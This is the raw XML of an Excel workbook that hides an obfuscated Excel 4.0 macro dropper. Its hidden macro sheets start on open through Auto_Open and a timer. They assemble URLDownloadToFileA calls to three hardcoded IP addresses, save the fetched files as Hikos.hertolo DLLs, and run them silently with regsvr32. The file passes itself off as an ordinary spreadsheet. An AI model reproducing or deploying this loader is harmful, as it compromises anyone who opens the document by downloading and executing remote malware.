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intlsheet1.xml" ContentType="application/vnd.ms-excel.intlmacrosheet+xml"/>
  <Override PartName="/xl/macrosheets/intlsheet2.xml" ContentType="application/vnd.ms-excel.intlmacrosheet+xml"/>
  <Override PartName="/xl/macrosheets/intlsheet3.xml" ContentType="application/vnd.ms-excel.intlmacrosheet+xml"/>
  <Override PartName="/xl/macrosheets/intlsheet4.xml" ContentType="application/vnd.ms-excel.intlmacrosheet+xml"/>
  <Override PartName="/xl/macrosheets/intlsheet5.xml" ContentType="application/vnd.ms-excel.intlmacrosheet+xml"/>
  <Override PartName="/xl/macrosheets/intlsheet6.xml" ContentType="application/vnd.ms-excel.intlmacrosheet+xml"/>
  <Override PartName="/xl/macrosheets/intlsheet7.xml" ContentType="application/vnd.ms-excel.intlmacrosheet+xml"/>
  <Override PartName="/xl/macrosheets/intlsheet8.xml" ContentType="application/vnd.ms-excel.intlmacrosheet+xml"/>
  <Override PartName="/xl/macrosheets/intlsheet9.xml" ContentType="application/vnd.ms-excel.intlmacro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/>
  <workbookPr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FDAD4EA1-36FF-493B-B0F5-7AA5555686F8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" sheetId="2" r:id="rId1"/>
    <sheet name="Pervi" sheetId="3" state="hidden" r:id="rId2"/>
    <sheet name="Pervi2" sheetId="4" state="hidden" r:id="rId3"/>
    <sheet name="sobr" sheetId="5" state="hidden" r:id="rId4"/>
    <sheet name="sobr1" sheetId="14" state="hidden" r:id="rId5"/>
    <sheet name="sobr2" sheetId="7" state="hidden" r:id="rId6"/>
    <sheet name="sobr3" sheetId="8" state="hidden" r:id="rId7"/>
    <sheet name="zap1" sheetId="9" state="hidden" r:id="rId8"/>
    <sheet name="zap2" sheetId="10" state="hidden" r:id="rId9"/>
    <sheet name="zap3" sheetId="11" state="hidden" r:id="rId10"/>
    <sheet name="osn" sheetId="12" state="hidden" r:id="rId11"/>
  </sheets>
  <definedNames>
    <definedName name="Klote">Pervi!$J$2</definedName>
    <definedName name="_xlnm.Auto_Open">osn!$A$2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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="21" uniqueCount="20">
  <si>
    <t>.dat</t>
  </si>
  <si>
    <t>=</t>
  </si>
  <si>
    <t>REGIS</t>
  </si>
  <si>
    <t>ser",,1,9)</t>
  </si>
  <si>
    <t>ToFile</t>
  </si>
  <si>
    <t>A","JJCCBB","Koki</t>
  </si>
  <si>
    <t>Download</t>
  </si>
  <si>
    <t>TER("uRlMon","URL</t>
  </si>
  <si>
    <t>EX</t>
  </si>
  <si>
    <t>..\Hikos.hertolo</t>
  </si>
  <si>
    <t>..\Hikos.hertolo1</t>
  </si>
  <si>
    <t>..\Hikos.hertolo2</t>
  </si>
  <si>
    <t>E</t>
  </si>
  <si>
    <t>C("regsvr</t>
  </si>
  <si>
    <t>32 -s "&amp;"..\Hikos.hertolo")</t>
  </si>
  <si>
    <t>32 -s "&amp;"..\Hikos.hertolo1")</t>
  </si>
  <si>
    <t>32 -s "&amp;"..\Hikos.hertolo2")</t>
  </si>
  <si>
    <t>217.147.172.75/</t>
  </si>
  <si>
    <t>185.117.73.134/</t>
  </si>
  <si>
    <t>101.99.95.204/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</si>
</sst>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IntlMacrosheet" Target="macrosheets/intlsheet7.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId3" Type="http://schemas.microsoft.com/office/2006/relationships/xlIntlMacrosheet" Target="macrosheets/intlsheet2.xml"/><Relationship Id="rId7" Type="http://schemas.microsoft.com/office/2006/relationships/xlIntlMacrosheet" Target="macrosheets/intlsheet6.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId2" Type="http://schemas.microsoft.com/office/2006/relationships/xlIntlMacrosheet" Target="macrosheets/intlsheet1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5.xml"/><Relationship Id="rId11" Type="http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet" Target="macrosheets/sheet1.xml"/><Relationship Id="rId5" Type="http://schemas.microsoft.com/office/2006/relationships/xlIntlMacrosheet" Target="macrosheets/intlsheet4.xml"/><Relationship Id="rId10" Type="http://schemas.microsoft.com/office/2006/relationships/xlIntlMacrosheet" Target="macrosheets/intlsheet9.xml"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2006/relationships/xlIntlMacrosheet" Target="macrosheets/intlsheet3.xml"/><Relationship Id="rId9" Type="http://schemas.microsoft.com/office/2006/relationships/xlIntlMacrosheet" Target="macrosheets/intlsheet8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180975</xdr:colOff>
      <xdr:row>52</xdr:row>
      <xdr:rowOff>152400</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="9" name="Pictures">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B574F9DF-6F46-4CC5-9033-54787935F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10058400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_rels/intl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_rels/intl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47BFF16-3647-4865-B01F-CFF5032E32ED}">
  <dimension ref="F7:K24"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="19.42578125" style="1" customWidth="1"/>
    <col min="2" max="5" width="8.7109375" style="1"/>
    <col min="6" max="6" width="16.5703125" style="1" customWidth="1"/>
    <col min="7" max="7" width="17" style="1" customWidth="1"/>
    <col min="8" max="8" width="8.7109375" style="1"/>
    <col min="9" max="9" width="16.28515625" style="1" customWidth="1"/>
    <col min="10" max="10" width="34" style="1" customWidth="1"/>
    <col min="11" max="11" width="12.140625" style="1" customWidth="1"/>
    <col min="12" max="16384" width="8.7109375" style="1"/>
  </cols>
  <sheetData>
    <row r="7" spans="6:11" x14ac:dyDescent="0.25">
      <c r="J7" s="1" t="b">
        <f>FORMULA(F12&amp;Pervi2!F13&amp;Pervi2!E14,J9)</f>
        <v>0</v>
      </c>
    </row>
    <row r="10" spans="6:11" x14ac:dyDescent="0.25">
      <c r="I10" s="1" t="s">
        <v>0</v>
      </c>
      <c r="J10" s="1">
        <f>RANDBETWEEN(245,8675436)</f>
        <v>7800682</v>
      </c>
    </row>
    <row r="12" spans="6:11" x14ac:dyDescent="0.25">
      <c r="F12" s="1" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="13" spans="6:11" x14ac:dyDescent="0.25">
      <c r="F13" s="1" t="s">
        <v>2</v>
      </c>
      <c r="J13" s="1" t="e">
        <f>Kokiser(J24,K13&amp;I14&amp;J10&amp;I10,sobr!D19,J24,J24)</f>
        <v>#NAME?</v>
      </c>
      <c r="K13" s="1" t="str">
        <f>K16&amp;K17&amp;K18</f>
        <v>http://</v>
      </c>
    </row>
    <row r="14" spans="6:11" x14ac:dyDescent="0.25">
      <c r="F14" s="1" t="s">
        <v>7</v>
      </c>
      <c r="I14" s="1" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="15" spans="6:11" x14ac:dyDescent="0.25">
      <c r="F15" s="1" t="s">
        <v>6</v>
      </c>
      <c r="I15" s="1" t="s">
        <v>18</v>
      </c>
      <c r="J15" s="1" t="e">
        <f>Kokiser(J24,K13&amp;I15&amp;J10&amp;I10,sobr!E19,J24,J24)</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="16" spans="6:11" x14ac:dyDescent="0.25">
      <c r="F16" s="1" t="s">
        <v>4</v>
      </c>
      <c r="I16" s="1" t="s">
        <v>19</v>
      </c>
      <c r="K16" s="1" t="str">
        <f>"ht"</f>
        <v>ht</v>
      </c>
    </row>
    <row r="17" spans="6:11" x14ac:dyDescent="0.25">
      <c r="F17" s="1" t="s">
        <v>5</v>
      </c>
      <c r="J17" s="1" t="e">
        <f>Kokiser(J24,K13&amp;I16&amp;J10&amp;I10,sobr!F19,J24,J24)</f>
        <v>#NAME?</v>
      </c>
      <c r="K17" s="1" t="str">
        <f>"tp"</f>
        <v>tp</v>
      </c>
    </row>
    <row r="18" spans="6:11" x14ac:dyDescent="0.25">
      <c r="F18" s="1" t="s">
        <v>3</v>
      </c>
      <c r="K18" s="1" t="str">
        <f>"://"</f>
        <v>://</v>
      </c>
    </row>
    <row r="21" spans="6:11" x14ac:dyDescent="0.25">
      <c r="J21" s="1" t="b">
        <f>GOTO(sobr!H4)</f>
        <v>0</v>
      </c>
    </row>
    <row r="24" spans="6:11" x14ac:dyDescent="0.25">
      <c r="J24" s="1">
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
</xm:macrosheet>
</file>

<file path=xl/macrosheets/intl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E4C23C8-402C-4855-A94B-79B9C3B5C8C7}">
  <dimension ref="E13:F15"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="14.42578125" style="1" customWidth="1"/>
    <col min="2" max="4" width="8.7109375" style="1"/>
    <col min="5" max="5" width="14" style="1" customWidth="1"/>
    <col min="6" max="6" width="20.5703125" style="1" customWidth="1"/>
    <col min="7" max="16384" width="8.7109375" style="1"/>
  </cols>
  <sheetData>
    <row r="13" spans="5:6" x14ac:dyDescent="0.25">
      <c r="F13" s="1" t="str">
        <f>Pervi!F13&amp;Pervi!F14</f>
        <v>REGISTER("uRlMon","URL</v>
      </c>
    </row>
    <row r="14" spans="5:6" x14ac:dyDescent="0.25">
      <c r="E14" s="1" t="str">
        <f>F14&amp;F15</f>
        <v>DownloadToFileA","JJCCBB","Kokiser",,1,9)</v>
      </c>
      <c r="F14" s="1" t="str">
        <f>Pervi!F15&amp;Pervi!F16</f>
        <v>DownloadToFile</v>
      </c>
    </row>
    <row r="15" spans="5:6" x14ac:dyDescent="0.25">
      <c r="F15" s="1" t="str">
        <f>Pervi!F17&amp;Pervi!F18</f>
        <v>A","JJCCBB","Kokiser",,1,9)</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
</xm:macrosheet>
</file>

<file path=xl/macrosheets/intl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C705E67-FBCE-463D-956E-F101FD370AA7}">
  <dimension ref="D8:K19"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="3" width="8.7109375" style="1"/>
    <col min="4" max="4" width="17.7109375" style="1" customWidth="1"/>
    <col min="5" max="5" width="12.5703125" style="1" customWidth="1"/>
    <col min="6" max="6" width="9.42578125" style="1" customWidth="1"/>
    <col min="7" max="7" width="8.7109375" style="1"/>
    <col min="8" max="8" width="20.140625" style="1" customWidth="1"/>
    <col min="9" max="10" width="8.7109375" style="1"/>
    <col min="11" max="11" width="12.5703125" style="1" customWidth="1"/>
    <col min="12" max="16384" width="8.7109375" style="1"/>
  </cols>
  <sheetData>
    <row r="8" spans="4:11" x14ac:dyDescent="0.25">
      <c r="D8" s="1" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="9" spans="4:11" x14ac:dyDescent="0.25">
      <c r="D9" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="10" spans="4:11" x14ac:dyDescent="0.25">
      <c r="D10" s="1" t="s">
        <v>12</v>
      </c>
      <c r="H10" s="1" t="b">
        <f>FORMULA(K10&amp;K11,I10)</f>
        <v>0</v>
      </c>
      <c r="K10" s="1" t="str">
        <f>D9&amp;D10</f>
        <v>EXE</v>
      </c>
    </row>
    <row r="11" spans="4:11" x14ac:dyDescent="0.25">
      <c r="K11" s="1" t="str">
        <f>D12</f>
        <v>C("regsvr</v>
      </c>
    </row>
    <row r="12" spans="4:11" x14ac:dyDescent="0.25">
      <c r="D12" s="1" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="15" spans="4:11" x14ac:dyDescent="0.25">
      <c r="D15" s="1" t="s">
        <v>14</v>
      </c>
      <c r="E15" s="1" t="s">
        <v>15</v>
      </c>
      <c r="F15" s="1" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="17" spans="4:8" x14ac:dyDescent="0.25">
      <c r="H17" s="1" t="e">
        <f>GOTO(sobr1!G3)</f>
        <v>#N/A</v>
      </c>
    </row>
    <row r="19" spans="4:8" x14ac:dyDescent="0.25">
      <c r="D19" s="1" t="s">
        <v>9</v>
      </c>
      <c r="E19" s="1" t="s">
        <v>10</v>
      </c>
      <c r="F19" s="1" t="s">
        <v>11</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
</xm:macrosheet>
</file>

<file path=xl/macrosheets/intl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474702B-62D2-4D48-A360-A9ADE618FD29}">
  <dimension ref="G8:G17"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="6" width="9.140625" style="1"/>
    <col min="7" max="7" width="32.5703125" style="1" customWidth="1"/>
    <col min="8" max="16384" width="9.140625" style="1"/>
  </cols>
  <sheetData>
    <row r="8" spans="7:7" x14ac:dyDescent="0.25">
      <c r="G8" s="1" t="b">
        <f>FORMULA(sobr!I10&amp;sobr!D15,H8)</f>
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="7:7" x14ac:dyDescent="0.25">
      <c r="G17" s="1" t="e">
        <f>GOTO(sobr2!H6)</f>
        <v>#N/A</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
</xm:macrosheet>
</file>

<file path=xl/macrosheets/intl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09A7A1B-3141-4E9F-ACDA-5112CD802904}">
  <dimension ref="H12:H19"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="10.85546875" style="1" customWidth="1"/>
    <col min="2" max="2" width="8.7109375" style="1"/>
    <col min="3" max="3" width="11.28515625" style="1" customWidth="1"/>
    <col min="4" max="7" width="8.7109375" style="1"/>
    <col min="8" max="8" width="33" style="1" customWidth="1"/>
    <col min="9" max="16384" width="8.7109375" style="1"/>
  </cols>
  <sheetData>
    <row r="12" spans="8:8" x14ac:dyDescent="0.25">
      <c r="H12" s="1" t="b">
        <f>FORMULA(sobr!I10&amp;sobr!E15,I12)</f>
        <v>0</v>
      </c>
    </row>
    <row r="19" spans="8:8" x14ac:dyDescent="0.25">
      <c r="H19" s="1" t="b">
        <f>GOTO(sobr3!H7)</f>
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
</xm:macrosheet>
</file>

<file path=xl/macrosheets/intl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73EF3D9-3A82-495A-8C09-62B0D75AC525}">
  <dimension ref="H14:H21"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="8.7109375" style="1"/>
    <col min="2" max="2" width="15.5703125" style="1" customWidth="1"/>
    <col min="3" max="7" width="8.7109375" style="1"/>
    <col min="8" max="8" width="26.140625" style="1" customWidth="1"/>
    <col min="9" max="16384" width="8.7109375" style="1"/>
  </cols>
  <sheetData>
    <row r="14" spans="8:8" x14ac:dyDescent="0.25">
      <c r="H14" s="1" t="b">
        <f>FORMULA(sobr!I10&amp;sobr!F15,I14)</f>
        <v>0</v>
      </c>
    </row>
    <row r="21" spans="8:8" x14ac:dyDescent="0.25">
      <c r="H21" s="1" t="b">
        <f>GOTO(zap1!H7)</f>
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
</xm:macrosheet>
</file>

<file path=xl/macrosheets/intlsheet7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DA7ECFB-5281-438C-A3F5-354783F37D5B}">
  <dimension ref="H10:H18"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="12.85546875" style="1" customWidth="1"/>
    <col min="2" max="2" width="8.7109375" style="1"/>
    <col min="3" max="3" width="11.42578125" style="1" customWidth="1"/>
    <col min="4" max="7" width="8.7109375" style="1"/>
    <col min="8" max="8" width="30.140625" style="1" customWidth="1"/>
    <col min="9" max="16384" width="8.7109375" style="1"/>
  </cols>
  <sheetData>
    <row r="10" spans="8:8" x14ac:dyDescent="0.25">
      <c r="H10" s="1" t="b">
        <f>FORMULA(sobr!D8&amp;sobr1!H8,H13)</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" spans="8:8" x14ac:dyDescent="0.25">
      <c r="H18" s="1" t="b">
        <f>GOTO(zap2!I6)</f>
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
</xm:macrosheet>
</file>

<file path=xl/macrosheets/intlsheet8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72A5B93-7EB0-4ADC-81C4-2331D80C6217}">
  <dimension ref="I15:I22"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="12.7109375" style="1" customWidth="1"/>
    <col min="2" max="2" width="11.5703125" style="1" customWidth="1"/>
    <col min="3" max="8" width="8.7109375" style="1"/>
    <col min="9" max="9" width="23" style="1" customWidth="1"/>
    <col min="10" max="16384" width="8.7109375" style="1"/>
  </cols>
  <sheetData>
    <row r="15" spans="9:9" x14ac:dyDescent="0.25">
      <c r="I15" s="1" t="b">
        <f>FORMULA(sobr!D8&amp;sobr2!I12,I18)</f>
        <v>0</v>
      </c>
    </row>
    <row r="22" spans="9:9" x14ac:dyDescent="0.25">
      <c r="I22" s="1" t="b">
        <f>GOTO(zap3!J11)</f>
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
</xm:macrosheet>
</file>

<file path=xl/macrosheets/intlsheet9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8AF8ED4-316A-4BC0-A18B-1ED79419BFAC}">
  <dimension ref="J15:J20"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="12.85546875" style="1" customWidth="1"/>
    <col min="2" max="9" width="8.7109375" style="1"/>
    <col min="10" max="10" width="20" style="1" customWidth="1"/>
    <col min="11" max="16384" width="8.7109375" style="1"/>
  </cols>
  <sheetData>
    <row r="15" spans="10:10" x14ac:dyDescent="0.25">
      <c r="J15" s="1" t="b">
        <f>FORMULA(sobr!D8&amp;sobr3!I14,J18)</f>
        <v>0</v>
      </c>
    </row>
    <row r="20" spans="10:10" x14ac:dyDescent="0.25">
      <c r="J20" s="1" t="b">
        <f>HALT()</f>
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3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82A3E90-EF7C-4C67-A03E-D054DC7362F9}">
  <dimension ref="A9:A16"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="13.42578125" style="1" customWidth="1"/>
    <col min="2" max="3" width="8.7109375" style="1"/>
    <col min="4" max="4" width="12.5703125" style="1" customWidth="1"/>
    <col min="5" max="7" width="8.7109375" style="1"/>
    <col min="8" max="8" width="11.140625" style="1" customWidth="1"/>
    <col min="9" max="16384" width="8.7109375" style="1"/>
  </cols>
  <sheetData>
    <row r="9" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A9" s="1" t="b">
        <f>PI()=ON.TIME(NOW()+"00:00:02","Klote")</f>
        <v>0</v>
      </c>
    </row>
    <row r="16" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A16" s="1" t="b">
        <f>HALT()</f>
        <v>0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86942-51F8-422E-AC29-07E7077DDAAA}">
  <dimension ref="A1"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="16384" width="8.7109375" style="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Макросы Excel 4.0</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>10</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="11" baseType="lpstr">
      <vt:lpstr>Sheet</vt:lpstr>
      <vt:lpstr>Pervi</vt:lpstr>
      <vt:lpstr>Pervi2</vt:lpstr>
      <vt:lpstr>sobr</vt:lpstr>
      <vt:lpstr>sobr1</vt:lpstr>
      <vt:lpstr>sobr2</vt:lpstr>
      <vt:lpstr>sobr3</vt:lpstr>
      <vt:lpstr>zap1</vt:lpstr>
      <vt:lpstr>zap2</vt:lpstr>
      <vt:lpstr>zap3</vt:lpstr>
      <vt:lpstr>osn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Rabota</dc:creator>
  <cp:lastModifiedBy>Frank</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-06-05T18:19:34Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-27T09:45:43Z</dcterms:modified>
</cp:coreProperties>
</file>